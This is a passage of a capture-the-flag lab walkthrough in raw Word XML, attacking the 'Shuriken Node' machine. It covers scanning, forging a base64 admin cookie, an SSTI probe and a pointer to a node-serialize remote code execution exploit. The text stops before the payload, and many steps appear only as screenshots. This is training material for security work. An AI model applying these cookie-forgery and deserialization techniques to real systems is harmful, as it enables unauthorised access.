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58366A2B" w:rsidR="00C173B3" w:rsidRDefault="00775F2D" w:rsidP="00DC0550">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Walkthrough </w:t>
      </w:r>
      <w:r w:rsidR="00BF17A3">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF17A3">
        <w:t>Shuriken Node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3EB7D98F" w14:textId="6377FE40" w:rsidR="00DC5AE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8970" w:history="1">
            <w:r w:rsidR="00DC5AEA" w:rsidRPr="00B01C05">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Host Discovery</w:t>
            </w:r>
            <w:r w:rsidR="00DC5AEA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DC5AEA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DC5AEA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc147658970 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DC5AEA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DC5AEA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC5AEA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00DC5AEA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E221A2B" w14:textId="2B7BA968" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5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71" w:history="1">
            <w:r w:rsidRPr="00B01C05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A794" w14:textId="456A91B2" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5A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72" w:history="1">
            <w:r w:rsidRPr="00B01C05">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Modify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CF4E" w14:textId="68287A1E" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5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73" w:history="1">
            <w:r w:rsidRPr="00B01C05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49A" w14:textId="10897EFF" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5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74" w:history="1">
            <w:r w:rsidRPr="00B01C05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6371" w14:textId="173D1D33" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5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75" w:history="1">
            <w:r w:rsidRPr="00B01C05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A211" w14:textId="7F117157" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5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76" w:history="1">
            <w:r w:rsidRPr="00B01C05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52FA" w14:textId="288BB18F" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5A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77" w:history="1">
            <w:r w:rsidRPr="00B01C05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EA68" w14:textId="54A78AD7" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5A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78" w:history="1">
            <w:r w:rsidRPr="00B01C05">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Misconfig Script (m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6A5A" w14:textId="0BE469B9" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5A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79" w:history="1">
            <w:r w:rsidRPr="00B01C05">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Directory tra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DEFA" w14:textId="5A83865E" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5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80" w:history="1">
            <w:r w:rsidRPr="00B01C05">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cracking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0664" w14:textId="5D9A00F1" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5A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81" w:history="1">
            <w:r w:rsidRPr="00B01C05">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SSH2Jo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27E9" w14:textId="7B779AF3" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5A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8982" w:history="1">
            <w:r w:rsidRPr="00B01C05">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Jo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D99B" w14:textId="59B6C368" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5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83" w:history="1">
            <w:r w:rsidRPr="00B01C05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DF7B" w14:textId="2C36AD28" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5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84" w:history="1">
            <w:r w:rsidRPr="00B01C05">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sudo -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5929" w14:textId="378B829A" w:rsidR="00DC5AEA" w:rsidRDefault="00DC5A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8985" w:history="1">
            <w:r w:rsidRPr="00B01C05">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Fl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474B4DD0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7658970"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Host Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5EC1B087" w14:textId="1170192C" w:rsidR="00D21621" w:rsidRDefault="00AA6941">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B8E4C84" wp14:editId="14827644">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>257602</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="857885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21104"/>
                <wp:lineTo x="21538" y="21104"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="362572097" name="Picture 1" descr="A black and white screen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72097" name="Picture 1" descr="A black and white screen with numbers and a black backgroun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5B5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13D1E748" wp14:editId="442B3EB3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4180952" cy="200000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18573"/>
                <wp:lineTo x="21456" y="18573"/>
                <wp:lineTo x="21456" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="83082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289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839A8" w14:textId="57E40770" w:rsidR="00A7181A" w:rsidRDefault="00286B57">
      <w:r w:rsidRPr="00507D93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:t>: 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153F377E" w14:textId="35ED6953" w:rsidR="00D21621" w:rsidRDefault="00286B57">
      <w:r w:rsidRPr="00507D93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Victim</w:t>
      </w:r>
      <w:r>
        <w:t>: 192.168.56.151</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ABA748" w14:textId="110CBC12" w:rsidR="00D21621" w:rsidRDefault="00DC0550" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc147658971"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="47CB4658" w14:textId="5C54C22B" w:rsidR="00D21621" w:rsidRDefault="0084531C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68199374" wp14:editId="3AA9D3FF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>217037</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2906395" cy="438785"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20631"/>
                <wp:lineTo x="21520" y="20631"/>
                <wp:lineTo x="21520" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="15679037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03743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6FC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1AB34AA9" wp14:editId="328E8AFE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6606</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4180952" cy="180952"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18254"/>
                <wp:lineTo x="21456" y="18254"/>
                <wp:lineTo x="21456" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="135956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66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F7FC8" w14:textId="76B0164F" w:rsidR="00507D93" w:rsidRDefault="00507D93"/>
    <w:p w14:paraId="381B17DA" w14:textId="5795A47D" w:rsidR="00507D93" w:rsidRDefault="009F7A69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="533C9431" wp14:editId="700E41FA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>742315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4128135" cy="186055"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19904"/>
                <wp:lineTo x="21530" y="19904"/>
                <wp:lineTo x="21530" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="166126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9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829">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E5871E7" wp14:editId="15649B61">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>421374</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="254000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19440"/>
                <wp:lineTo x="21538" y="19440"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="210312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25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6AE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56DEA45B" wp14:editId="49587282">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>9094</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>120868</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4039235" cy="177800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18514"/>
                <wp:lineTo x="21495" y="18514"/>
                <wp:lineTo x="21495" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="162881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10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03ABF" w14:textId="5C19EECD" w:rsidR="00507D93" w:rsidRDefault="00507D93"/>
    <w:p w14:paraId="02E6004D" w14:textId="5788D7CC" w:rsidR="00732BD6" w:rsidRDefault="00112211" w:rsidP="00AA0C5D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc147658972"/>
      <w:r>
        <w:t>Modify Browser</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6D8E8FA3" w14:textId="37CB8C45" w:rsidR="00D76D42" w:rsidRDefault="001F4B6F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1EECAB09" wp14:editId="7C6BC645">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8426</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3452495" cy="513080"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20851"/>
                <wp:lineTo x="21453" y="20851"/>
                <wp:lineTo x="21453" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="2112393934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3934" name="Picture 1" descr="A black rectangular object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8AF1A" w14:textId="77777777" w:rsidR="009A32B3" w:rsidRDefault="009A32B3"/>
    <w:p w14:paraId="09FD2058" w14:textId="1619708D" w:rsidR="00DC0550" w:rsidRDefault="00F34F33" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc147658973"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="326C7E5B" wp14:editId="68FF976E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>338389</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="139065"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="17753"/>
                <wp:lineTo x="21538" y="17753"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="150415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0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550">
        <w:t>Nikto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="78F3C857" w14:textId="6E104A79" w:rsidR="00D21621" w:rsidRDefault="00E02C1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0165FE71" wp14:editId="01609C06">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>210052</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3590476" cy="219048"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18837"/>
                <wp:lineTo x="21432" y="18837"/>
                <wp:lineTo x="21432" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="5777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7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9EF15" w14:textId="3C0B1AB7" w:rsidR="00D21621" w:rsidRDefault="00DC0550" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc147658974"/>
      <w:r>
        <w:t>Viewing Website</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="65BCED0D" w14:textId="5C147D1D" w:rsidR="00D21621" w:rsidRDefault="00FF18D9">
      <w:r>
        <w:t>I found that there was nothing really of interest on the main page. I went an visited the /login/ page. That contain nothing in the source code.</w:t>
      </w:r>
      <w:r w:rsidR="00EC4763">
        <w:t xml:space="preserve"> However I looked at the storage tab of the inspect element and found a cookie: </w:t>
      </w:r>
      <w:r w:rsidR="00EC4763" w:rsidRPr="00EC4763">
        <w:t>eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ%3D%3D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FECBAE" w14:textId="1C5AB8CF" w:rsidR="00EC4763" w:rsidRDefault="006B6540">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CB86BED" wp14:editId="5F708BA7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31510" cy="274955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19455"/>
                <wp:lineTo x="21538" y="19455"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="167379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99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8C5">
        <w:t>I will try and decode it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C139EC" w14:textId="6431DABC" w:rsidR="00FF18D9" w:rsidRDefault="007C0F30">
      <w:r>
        <w:t>I will try and modify it to let me in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1614E92E" w14:textId="3A042E05" w:rsidR="00FF18D9" w:rsidRDefault="00D4230A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D663BCD" wp14:editId="1896589A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6606</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1910080" cy="536575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20705"/>
                <wp:lineTo x="21327" y="20705"/>
                <wp:lineTo x="21327" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1298877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7759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0209" cy="53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5BF9" w14:textId="77777777" w:rsidR="00D4230A" w:rsidRDefault="00D4230A"/>
    <w:p w14:paraId="3DC2EBB9" w14:textId="77777777" w:rsidR="00D4230A" w:rsidRDefault="00D4230A"/>
    <w:p w14:paraId="643B3B5D" w14:textId="2897F407" w:rsidR="00D4230A" w:rsidRDefault="0014570F">
      <w:r w:rsidRPr="0014570F">
        <w:t>eyJ1c2VybmFtZSI6IkFkbWluIiwiaXNHdWVzdCI6ZmFsc2UsImVuY29kaW5nIjogInV0Zi04In0=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F9B880" w14:textId="50D468D1" w:rsidR="00D4230A" w:rsidRDefault="002173B9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48F2A3D" wp14:editId="2984DD7A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4551529</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>689013</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="122745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120" y="21337"/>
                <wp:lineTo x="21120" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="358293522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93522" name="Picture 1" descr="A screenshot of a login p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4AE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="67E973CE" wp14:editId="5241A192">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="552450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20855"/>
                <wp:lineTo x="21538" y="20855"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="51167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73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4AE">
        <w:t>Paste it in the value section and refresh the page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA43162" w14:textId="40E047FB" w:rsidR="00BB6B70" w:rsidRDefault="002173B9">
      <w:r>
        <w:t>You should now see the home page welcoming you as admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4971455F" w14:textId="3CF68937" w:rsidR="002173B9" w:rsidRDefault="005215DC">
      <w:r>
        <w:t>I then read up on SSTI</w:t>
      </w:r>
      <w:r w:rsidR="00E7409B">
        <w:t xml:space="preserve"> (server side template injection)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and tried basic injection payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AA45BD" w14:textId="027D4D8C" w:rsidR="002173B9" w:rsidRDefault="001037A0">
      <w:r w:rsidRPr="00B02076">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>I tried</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="001037A0">
        <w:t>${7*7}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="001037A0">
        <w:t>JHs3Kjcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3374C5A5" w14:textId="583B56B5" w:rsidR="002173B9" w:rsidRDefault="005E334F">
      <w:r>
        <w:t>After refreshing the page I got this error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AF625C" w14:textId="77777777" w:rsidR="000C191B" w:rsidRPr="000C191B" w:rsidRDefault="000C191B" w:rsidP="000C1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</w:pPr>
      <w:r w:rsidRPr="000C191B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t>SyntaxError: Unexpected token $ in JSON at position 0</w:t>
      </w:r>
      <w:r w:rsidRPr="000C191B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br/>
        <w:t xml:space="preserve">    at JSON.parse (&lt;anonymous&gt;)</w:t>
      </w:r>
      <w:r w:rsidRPr="000C191B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    at Object.exports.unserialize (/home/web/shuriken-node/node_modules/node-serialize/lib/serialize.js:62:16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62979483" w14:textId="2B08F3FD" w:rsidR="00356D28" w:rsidRDefault="00356D28"/>
    <w:p w14:paraId="362B6E3F" w14:textId="73ACE2B8" w:rsidR="000C191B" w:rsidRDefault="000C191B">
      <w:r>
        <w:t>This is good information because it says its serialisation. A quick google search shows a node serialisation remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0679ABE2" w14:textId="193E211D" w:rsidR="002173B9" w:rsidRDefault="00000000">
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00493F4A" w:rsidRPr="007879B2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/50036</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76A4A4E4" w14:textId="2001AE65" w:rsidR="00DC0550" w:rsidRDefault="00DC0550" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc147658975"/>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="54751051" w14:textId="320D7075" w:rsidR="00D21621" w:rsidRDefault="009553A6">
      <w:r>
        <w:t>Using a script I found online to generate the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF2A267" w14:textId="687D200A" w:rsidR="009553A6" w:rsidRDefault="009553A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23432109" wp14:editId="4653D2E1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6444</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4361905" cy="257143"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19248"/>
                <wp:lineTo x="21414" y="19248"/>
                <wp:lineTo x="21414" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="85962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250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8EA35" w14:textId="00461464" w:rsidR="00CF4F29" w:rsidRDefault="006F44BD">
      <w:r>
        <w:t>I then had it put it in this format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44891A35" w14:textId="2783CB61" w:rsidR="00D15B6A" w:rsidRPr="00D15B6A" w:rsidRDefault="00D15B6A" w:rsidP="00D15B6A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D15B6A">
        <w:rPr>
          <w:rStyle w:val="ou"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>{</w:t>
